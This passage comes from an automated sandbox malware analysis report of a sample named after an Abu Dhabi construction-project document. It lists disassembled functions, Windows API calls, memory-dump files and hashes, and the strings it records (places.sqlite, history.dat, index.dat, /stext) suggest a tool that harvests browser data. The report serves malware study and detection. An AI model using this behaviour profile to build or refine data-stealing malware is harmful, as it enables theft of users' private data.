                                                                                                                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                            • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                            • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                            • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                            • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                            • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                          • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                            • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                            • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                            • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                                          • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                          • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                            • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                            • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                            • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1979745280-0
                                                                                                                          • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                                          • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                          • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                                          • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                          Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                            • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                            • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                          • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                          • free.MSVCRT ref: 00418803
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1355100292-0
                                                                                                                          • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                          • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                          • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                          • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                          Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                          • memset.MSVCRT ref: 00403A55
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                          • String ID: history.dat$places.sqlite
                                                                                                                          • API String ID: 2641622041-467022611
                                                                                                                          • Opcode ID: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                                                                                                          • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                          • Opcode Fuzzy Hash: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                                                                                                          • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                          Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                          • GetLastError.KERNEL32 ref: 00417627
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$File$PointerRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 839530781-0
                                                                                                                          • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                                          • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                          • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                                          • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                          Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFindFirst
                                                                                                                          • String ID: *.*$index.dat
                                                                                                                          • API String ID: 1974802433-2863569691
                                                                                                                          • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                                          • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                          • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                                          • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                          Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                          • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                          • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$FilePointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1156039329-0
                                                                                                                          • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                          • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                          • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                          • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                          Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                          • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseCreateHandleTime
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3397143404-0
                                                                                                                          • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                          • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                          • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                          • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                          Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                          • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1125800050-0
                                                                                                                          • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                          • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                          • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                          • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                          Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                          • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandleSleep
                                                                                                                          • String ID: }A
                                                                                                                          • API String ID: 252777609-2138825249
                                                                                                                          • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                          • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                          • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                          • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                          Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • malloc.MSVCRT ref: 00409A10
                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                          • free.MSVCRT ref: 00409A31
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: freemallocmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3056473165-0
                                                                                                                          • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                          • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                          • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                          • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                          Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: d
                                                                                                                          • API String ID: 0-2564639436
                                                                                                                          • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                          • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                          • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                          • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                          Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset
                                                                                                                          • String ID: BINARY
                                                                                                                          • API String ID: 2221118986-907554435
                                                                                                                          • Opcode ID: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                                                                          • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                          • Opcode Fuzzy Hash: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                                                                          • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                          Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcsicmp
                                                                                                                          • String ID: /stext
                                                                                                                          • API String ID: 2081463915-3817206916
                                                                                                                          • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                                          • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                          • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                                          • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                          Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                          • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2445788494-0
                                                                                                                          • Opcode ID: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                                                                          • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                          • Opcode Fuzzy Hash: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                                                                          • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                          Function 004152C7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
